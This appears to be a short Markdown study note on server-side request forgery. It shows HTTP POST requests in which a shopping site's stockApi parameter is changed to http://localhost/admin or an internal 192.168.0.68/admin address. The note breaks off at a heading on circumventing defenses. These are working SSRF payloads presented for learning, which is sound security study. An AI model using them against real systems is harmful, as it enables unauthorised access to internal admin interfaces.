40 lines
1.2 KiB
Markdown
40 lines
1.2 KiB
Markdown
|
|
||
|
|
## Common Attacks
|
||
|
|
|
||
|
|
Attacks Against the Server Itself
|
||
|
|
- Attacker induces the application to make an HTTP request back to the server that is hosting the application (via loopback)
|
||
|
|
- Involves supplying the URL with a hostname like 127.0.0.1 or localhost
|
||
|
|
- Example code -- shopping application that allows user to check stock
|
||
|
|
```
|
||
|
|
POST /product/stock HTTP/1.0
|
||
|
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
Content-Length: 118
|
||
|
|
stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D
|
||
|
|
6%26storeId%3D1
|
||
|
|
```
|
||
|
|
- Makes request to the URL
|
||
|
|
- Retrieves the stock status
|
||
|
|
- Return to the user
|
||
|
|
- Modify this for an attack:
|
||
|
|
```
|
||
|
|
POST /product/stock HTTP/1.0
|
||
|
|
Content-Type: application/x-www-form-
|
||
|
|
urlencoded
|
||
|
|
Content-Length: 118
|
||
|
|
stockApi=http://localhost/admin
|
||
|
|
```
|
||
|
|
- Server fetches contents of the /admin url and returns to the user
|
||
|
|
- Authenticates as the machine/server itself
|
||
|
|
|
||
|
|
Attacks Against Other Systems
|
||
|
|
- Assume there is an administrative interface at https://192.168.0.68/admin
|
||
|
|
- Attack can exploit and access this:
|
||
|
|
```
|
||
|
|
POST /product/stock HTTP/1.0
|
||
|
|
Content-Type: application/x-www-form-
|
||
|
|
urlencoded
|
||
|
|
Content-Length: 118
|
||
|
|
stockApi=http://192.168.0.68/admin
|
||
|
|
```
|
||
|
|
|
||
|
|
Circumventing Common SSRF Defenses
|